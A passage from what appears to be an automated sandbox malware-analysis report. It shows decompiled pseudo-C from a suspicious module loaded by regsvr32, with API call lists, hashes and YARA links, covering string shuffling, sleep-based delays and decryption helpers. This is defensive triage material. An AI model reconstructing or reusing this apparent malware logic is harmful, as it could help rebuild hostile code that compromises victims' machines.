						} while (E04F978DB(_t63, _t69, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}































                    0x04f96535
                    0x04f9653f
                    0x04f96542
                    0x04f96545
                    0x04f96548
                    0x04f9654f
                    0x04f96551
                    0x04f9655d
                    0x04f9655f
                    0x04f9655f
                    0x04f96568
                    0x04f96570
                    0x04f96573
                    0x04f9658d
                    0x04f96599
                    0x04f9659b
                    0x04f965a0
                    0x04f965aa
                    0x04f965aa
                    0x04f965a2
                    0x04f965a2
                    0x04f965a2
                    0x04f965a2
                    0x04f965b1
                    0x04f965be
                    0x04f965c5
                    0x04f965ca
                    0x04f965ca
                    0x04f965d3
                    0x04f965d6
                    0x04f965fc
                    0x04f96608
                    0x04f9660d
                    0x04f9660f
                    0x04f96614
                    0x04f96640
                    0x04f96642
                    0x04f96616
                    0x04f9661a
                    0x04f9661f
                    0x04f96624
                    0x04f9662b
                    0x04f96631
                    0x04f96636
                    0x04f9663c
                    0x04f96643
                    0x04f96645
                    0x04f96647
                    0x04f96656
                    0x04f9665c
                    0x04f9665e
                    0x04f96663
                    0x04f96693
                    0x04f96695
                    0x04f96665
                    0x04f96665
                    0x04f9666b
                    0x04f96678
                    0x04f9667e
                    0x04f9667e
                    0x04f96686
                    0x04f9668f
                    0x04f96696
                    0x04f96698
                    0x04f9669a
                    0x04f966a1
                    0x04f966ae
                    0x04f966b3
                    0x04f966b8
                    0x04f966ba
                    0x04f966bc
                    0x00000000
                    0x00000000
                    0x04f966be
                    0x04f966c3
                    0x04f966c5
                    0x04f966cc
                    0x04f966d0
                    0x04f966d3
                    0x04f966e8
                    0x04f966ec
                    0x04f966f1
                    0x00000000
                    0x04f966f1
                    0x04f966d5
                    0x04f966d7
                    0x00000000
                    0x00000000
                    0x04f966e2
                    0x04f966e4
                    0x04f966e6
                    0x00000000
                    0x00000000
                    0x00000000
                    0x04f966e6
                    0x04f966c9
                    0x04f966c9
                    0x04f9669a
                    0x04f965d8
                    0x04f965d8
                    0x04f965dd
                    0x04f966f3
                    0x04f966f8
                    0x04f96700
                    0x04f96700
                    0x00000000
                    0x04f966f8
                    0x04f965e3
                    0x04f965e6
                    0x04f965f0
                    0x04f965f7
                    0x00000000
                    0x04f96708
                    0x04f96708
                    0x04f9670b
                    0x04f9670f
                    0x04f9670f

                    APIs
                      • Part of subcall function 04F94843: GetModuleHandleA.KERNEL32(4C44544E,00000000,04F9654D,00000001), ref: 04F94852
                    • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04F965CA
                      • Part of subcall function 04F963FD: RtlAllocateHeap.NTDLL(00000000,00000000,04F928D5), ref: 04F96409
                    • memset.NTDLL ref: 04F9661A
                    • RtlInitializeCriticalSection.NTDLL(05AC9570), ref: 04F9662B
                      • Part of subcall function 04F97576: memset.NTDLL ref: 04F97590
                      • Part of subcall function 04F97576: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04F975D6
                      • Part of subcall function 04F97576: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 04F975E1
                    • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04F96656
                    • wsprintfA.USER32 ref: 04F96686
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                    • String ID:
                    • API String ID: 4246211962-0
                    • Opcode ID: 6f21ac3f2693148db127ff6dc1b532e7b5ef16603546dc01db535019cc4d0697
                    • Instruction ID: bfe4f8467ececb22569c684ee80ae89f2ec647e6029f951543955ea3a2940532
                    • Opcode Fuzzy Hash: 6f21ac3f2693148db127ff6dc1b532e7b5ef16603546dc01db535019cc4d0697
                    • Instruction Fuzzy Hash: 39519271E00259ABFF61ABB5EC45F6E37F8EB04744F10442AE501EB140EAB9BD468B91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F937CE Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 22%
                    			E04F937CE(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E04F963FD(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E04F917AB(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E04F963FD((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x4f9a318 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                    0x04f937d5
                    0x04f937dc
                    0x04f937e1
                    0x04f937e4
                    0x04f937eb
                    0x04f937ee
                    0x04f937f1
                    0x04f937f8
                    0x04f937fb
                    0x04f9394f
                    0x04f93951
                    0x04f93953
                    0x04f93958
                    0x04f93958
                    0x04f93801
                    0x04f93804
                    0x04f93807
                    0x04f93809
                    0x04f93809
                    0x04f9380d
                    0x00000000
                    0x00000000
                    0x04f93811
                    0x04f9383d
                    0x04f93842
                    0x04f93844
                    0x04f93844
                    0x04f93847
                    0x04f9384a
                    0x04f9384a
                    0x04f9384c
                    0x00000000
                    0x04f93817
                    0x04f93819
                    0x04f93838
                    0x04f93838
                    0x04f9384f
                    0x04f9384f
                    0x04f93850
                    0x04f93850
                    0x04f93853
                    0x00000000
                    0x00000000
                    0x00000000
                    0x04f93853
                    0x04f9381d
                    0x04f93864
                    0x04f93868
                    0x04f93942
                    0x04f93944
                    0x04f93944
                    0x04f93945
                    0x04f93948
                    0x00000000
                    0x04f93948
                    0x04f93871
                    0x04f93882
                    0x04f93886
                    0x04f9393e
                    0x00000000
                    0x04f9393e
                    0x04f9388c
                    0x04f9388f
                    0x04f93893
                    0x04f93899
                    0x04f9389c
                    0x04f93934
                    0x04f93934
                    0x00000000
                    0x04f9393a
                    0x04f938a7
                    0x04f938b0
                    0x04f938c4
                    0x04f938cb
                    0x04f938e0
                    0x04f938e6
                    0x04f938ee
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x04f938f0
                    0x04f938f0
                    0x04f938f0
                    0x04f938f7
                    0x04f938ff
                    0x00000000
                    0x00000000
                    0x04f93901
                    0x04f9390a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x04f9390c
                    0x04f9390e
                    0x04f93911
                    0x04f93911
                    0x04f93914
                    0x04f93918
                    0x04f9391b
                    0x04f93921
                    0x04f93924
                    0x04f9392b
                    0x00000000
                    0x04f938a7
                    0x04f93822
                    0x04f9382d
                    0x04f93830
                    0x04f93832
                    0x04f93832
                    0x04f93835
                    0x04f93837
                    0x00000000
                    0x04f93837
                    0x04f93811
                    0x04f93857
                    0x04f9385c
                    0x04f9385e
                    0x04f9385e
                    0x04f93861
                    0x04f93861
                    0x00000000

                    APIs
                      • Part of subcall function 04F963FD: RtlAllocateHeap.NTDLL(00000000,00000000,04F928D5), ref: 04F96409
                    • lstrcpy.KERNEL32(69B25F45,00000020), ref: 04F938CB
                    • lstrcat.KERNEL32(69B25F45,00000020), ref: 04F938E0
                    • lstrcmp.KERNEL32(00000000,69B25F45), ref: 04F938F7
                    • lstrlen.KERNEL32(69B25F45), ref: 04F9391B
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                    • String ID:
                    • API String ID: 3214092121-3916222277
                    • Opcode ID: 9bacb6487d96f13bade31d5462700c4964831580c0d93a6bedaa45aaa3ccb341
                    • Instruction ID: a2d6da87c80f62cfc13160f6817ea455b3fc9e33cc20b5e77b7b849a816e054c
                    • Opcode Fuzzy Hash: 9bacb6487d96f13bade31d5462700c4964831580c0d93a6bedaa45aaa3ccb341
                    • Instruction Fuzzy Hash: A5513B72E00218EBEF218F99C484AADBBF6FF49714F15805AEC55AB211C771AE52CB40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F93399 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94memoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E04F93399(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E04F940C7(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x4f9a320; // 0xb2d5a8
				_t4 = _t24 + 0x4f9be30; // 0x5ac93d8
				_t5 = _t24 + 0x4f9bdd8; // 0x4f0053
				_t26 = E04F92985( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x4f9a320; // 0xb2d5a8
						_t11 = _t32 + 0x4f9be24; // 0x5ac93cc
						_t48 = _t11;
						_t12 = _t32 + 0x4f9bdd8; // 0x4f0053
						_t52 = E04F9114D(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x4f9a320; // 0xb2d5a8
							_t13 = _t35 + 0x4f9be6e; // 0x30314549
							if(E04F95231(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x4f9a2fc - 6;
								if( *0x4f9a2fc <= 6) {
									_t42 =  *0x4f9a320; // 0xb2d5a8
									_t15 = _t42 + 0x4f9bdba; // 0x52384549
									E04F95231(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x4f9a320; // 0xb2d5a8
							_t17 = _t38 + 0x4f9be68; // 0x5ac9410
							_t18 = _t38 + 0x4f9be40; // 0x680043
							_t45 = E04F934EE(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x4f9a2d8, 0, _t52);
						}
					}
					HeapFree( *0x4f9a2d8, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E04F94B59(_t54);
				}
				return _t45;
			}


















                    0x04f93399
                    0x04f933a9
                    0x04f933ac
                    0x04f933b3
                    0x04f933b5
                    0x04f933b5
                    0x04f933b8
                    0x04f933bd
                    0x04f933c4
                    0x04f933d1
                    0x04f933d6
                    0x04f933da
                    0x04f933e8
                    0x04f933f6
                    0x04f933fa
                    0x04f9348b
                    0x04f9348b
                    0x04f93400
                    0x04f93400
                    0x04f93405
                    0x04f93405
                    0x04f9340c
                    0x04f93418
                    0x04f9341a
                    0x04f9341c
                    0x04f9341e
                    0x04f93425
                    0x04f93437
                    0x04f93439
                    0x04f93440
                    0x04f93442
                    0x04f93449
                    0x04f93454
                    0x04f93454
                    0x04f93440
                    0x04f93459
                    0x04f9345e
                    0x04f93465
                    0x04f93483
                    0x04f93485
                    0x04f93485
                    0x04f9341c
                    0x04f93497
                    0x04f93497
                    0x04f93499
                    0x04f9349e
                    0x04f934a0
                    0x04f934a0
                    0x04f934ab

                    APIs
                    • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05AC93D8,00000000,?,74E5F710,00000000,74E5F730), ref: 04F933E8
                    • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05AC9410,?,00000000,30314549,00000014,004F0053,05AC93CC), ref: 04F93485
                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04F954F9), ref: 04F93497
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: FreeHeap
                    • String ID: Ut
                    • API String ID: 3298025750-8415677
                    • Opcode ID: 4b19395d2a84bf48c83009bc8dc69a1bf4c695b97ae52d07ac58b41f605a937b
                    • Instruction ID: 8836a5b4a70b20fe0da676b733b7b10c96d05d4526f7cd84d4bfc508ba2accc9
                    • Opcode Fuzzy Hash: 4b19395d2a84bf48c83009bc8dc69a1bf4c695b97ae52d07ac58b41f605a937b
                    • Instruction Fuzzy Hash: 96316F32900149BFEF129B94EC44E9E77FDEB49704F150069BA00AB151DA72BE099B60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F914E4 Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON
                    Download Yara Rule
                    APIs
                    • SysAllocString.OLEAUT32(80000002), ref: 04F9153B
                    • SysAllocString.OLEAUT32(04F92BCC), ref: 04F9157E
                    • SysFreeString.OLEAUT32(00000000), ref: 04F91592
                    • SysFreeString.OLEAUT32(00000000), ref: 04F915A0
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: String$AllocFree
                    • String ID:
                    • API String ID: 344208780-0
                    • Opcode ID: 59c209586d2609ff72215648784eb64d3ae0275ed86f9e7e8ed2bd90f23ff28c
                    • Instruction ID: 782fecc05cdbd32ae70a5bab7662f62960293b5850a667210a284ed71d6eda78
                    • Opcode Fuzzy Hash: 59c209586d2609ff72215648784eb64d3ae0275ed86f9e7e8ed2bd90f23ff28c
                    • Instruction Fuzzy Hash: DB31DBB290020AEFDF45DF98D9848AE7BF5FF48340B51842EF50A97210E775AE46CB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F957A8 Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 78%
                    			E04F957A8(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E04F963FD(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                    0x04f957b4
                    0x04f957b8
                    0x04f957b9
                    0x04f957ba
                    0x04f957bc
                    0x04f957be
                    0x04f957c3
                    0x04f957c6
                    0x04f9585d
                    0x04f95864
                    0x04f95864
                    0x04f957cf
                    0x04f957d6
                    0x04f957e6
                    0x04f957e6
                    0x04f957ec
                    0x04f957ee
                    0x04f957f3
                    0x04f957fc
                    0x04f95804
                    0x04f95807
                    0x04f95812
                    0x04f95816
                    0x04f95818
                    0x04f95819
                    0x04f95822
                    0x04f95826
                    0x04f95837
                    0x04f95828
                    0x04f9582d
                    0x04f95832
                    0x04f95841
                    0x04f95841
                    0x04f95816
                    0x04f95847
                    0x04f9584d
                    0x04f9584d
                    0x04f95856
                    0x04f9585b
                    0x04f9585b
                    0x00000000

                    APIs
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: FreeSleepStringlstrlenmemcpy
                    • String ID:
                    • API String ID: 1198164300-0
                    • Opcode ID: 62ae9a8b9dd7781415fd1f253bfb7a7f9a38b97b0c38c1550d8a2c01f81ba8e1
                    • Instruction ID: d2de3f987403c62c0da2a6df7700739d9928e29f82c88183cda82255e58e0a62
                    • Opcode Fuzzy Hash: 62ae9a8b9dd7781415fd1f253bfb7a7f9a38b97b0c38c1550d8a2c01f81ba8e1
                    • Instruction Fuzzy Hash: 29212C76A01209FFEF11DFA4D88499EBBF8EF49300B1045A9E955D7210EB71AE06CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F92A4C Relevance: 6.0, APIs: 4, Instructions: 44sleepthreadtimeCOMMON
                    Download Yara Rule
                    C-Code - Quality: 65%
                    			E04F92A4C(void* __ecx, intOrPtr _a4) {
				struct _FILETIME _v12;
				int _t13;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t30;
				signed int _t34;

				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				asm("stosd");
				do {
					_t13 = SwitchToThread();
					GetSystemTimeAsFileTime( &_v12);
					_t23 = _v12.dwHighDateTime;
					_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
					_push(0);
					_push(0x13);
					_push(_t23 >> 5);
					_push(_t16);
					L04F982E6();
					_t34 = _t16 + _t13;
					_t18 = E04F92888(_a4, _t34);
					_t30 = _t18;
					_t19 = 3;
					Sleep(_t19 << (_t34 & 0x00000007)); // executed
				} while (_t30 == 1);
				return _t30;
			}











                    0x04f92a51
                    0x04f92a5c
                    0x04f92a5d
                    0x04f92a5d
                    0x04f92a69
                    0x04f92a72
                    0x04f92a75
                    0x04f92a79
                    0x04f92a7b
                    0x04f92a80
                    0x04f92a81
                    0x04f92a82
                    0x04f92a8c
                    0x04f92a8f
                    0x04f92a96
                    0x04f92a9a
                    0x04f92aa1
                    0x04f92aa7
                    0x04f92ab1

                    APIs
                    • SwitchToThread.KERNEL32(?,00000001,?,?,?,04F94610,?,?), ref: 04F92A5D
                    • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,04F94610,?,?), ref: 04F92A69
                    • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 04F92A82
                      • Part of subcall function 04F92888: memcpy.NTDLL(00000000,00000000,?,?,00000000,?,?,?,00000000), ref: 04F928E7
                    • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,04F94610,?,?), ref: 04F92AA1
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
                    • String ID:
                    • API String ID: 1610602887-0
                    • Opcode ID: a80d411c4f81de76ae8d7ab979fddcd6049233ad706ee26e5055b1d29629ff57
                    • Instruction ID: 2100578fcba32408b68c6590f9ea323530ef1f2ad24bb0e2354180981d6fb1e7
                    • Opcode Fuzzy Hash: a80d411c4f81de76ae8d7ab979fddcd6049233ad706ee26e5055b1d29629ff57
                    • Instruction Fuzzy Hash: 90F0A4B3A40108BBEB149BA4DC19F9F7AE8DB85355F110568F611E7340E9B8AE01C6A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F93B61 Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                    Download Yara Rule
                    C-Code - Quality: 47%
                    			E04F93B61(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E04F963FD(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x4f99284); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}











                    0x04f93b65
                    0x04f93b72
                    0x04f93b74
                    0x04f93b75
                    0x04f93b7d
                    0x04f93b7d
                    0x04f93b81
                    0x00000000
                    0x00000000
                    0x04f93b78
                    0x04f93b79
                    0x04f93b7c
                    0x04f93b7c
                    0x04f93b89
                    0x04f93b90
                    0x04f93b93
                    0x04f93b9b
                    0x04f93ba1
                    0x04f93ba3
                    0x04f93ba6
                    0x04f93baa
                    0x04f93bac
                    0x04f93baf
                    0x04f93baf
                    0x04f93bb0
                    0x04f93bb2
                    0x04f93baf
                    0x04f93bbc
                    0x04f93bbf
                    0x04f93bc2
                    0x04f93bc5
                    0x04f93bc5
                    0x04f93bcc
                    0x04f93bcc
                    0x04f93bd8

                    APIs
                    • StrChrA.SHLWAPI(?,00000020,00000000,05AC95AC,?,?,04F9104B,?,05AC95AC), ref: 04F93B7D
                    • StrTrimA.SHLWAPI(?,04F99284,00000002,?,04F9104B,?,05AC95AC), ref: 04F93B9B
                    • StrChrA.SHLWAPI(?,00000020,?,04F9104B,?,05AC95AC), ref: 04F93BA6
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: Trim
                    • String ID:
                    • API String ID: 3043112668-0
                    • Opcode ID: eb372cee8089758ebb6a9d318cfc35438e3e8f578a405ef039913ec89552a97c
                    • Instruction ID: 65c8dea0cea3243ce5daad0f3940e7a4201c81d82e3b6bc77ab19b86d38a37a5
                    • Opcode Fuzzy Hash: eb372cee8089758ebb6a9d318cfc35438e3e8f578a405ef039913ec89552a97c
                    • Instruction Fuzzy Hash: 010171B27003456FFB505E2A9C45F573BDDEBCD794F044011AE55CB291DA70EC438660
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F9607D Relevance: 3.8, APIs: 3, Instructions: 81COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E04F9607D(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* _t24;
				intOrPtr _t27;
				void* _t35;
				signed char* _t46;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t53 = ( *_t46 & 0x000000ff) + 0x110;
				_v12 = 0x110;
				_t24 = E04F963FD(_t53);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0x4f9a374, 0x110);
					_t27 =  *0x4f9a378; // 0x0
					_t57 = _t56 + 0xc;
					if(_t27 != 0) {
						_t51 = _a4;
						E04F943A6(0x110, _a4, _t27, 0);
					}
					if(E04F95B65( &_v36) != 0) {
						_t35 = E04F94872(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
						if(_t35 == 0) {
							_t55 = _v20;
							_v36 =  *_t46;
							_v16 = E04F96412(_t55, _a8, _t51, _t46, _a12);
							 *(_t55 + 4) = _v36;
							_t20 =  &(_t46[4]); // 0xbf0845c7
							memset(_t55, 0, _v12 - ( *_t20 & 0xf));
							_t57 = _t57 + 0xc;
							E04F917AB(_t55);
						}
					}
					memset(_a4, 0, _t53);
					E04F917AB(_a4);
				}
				return _v16;
			}















                    0x04f96083
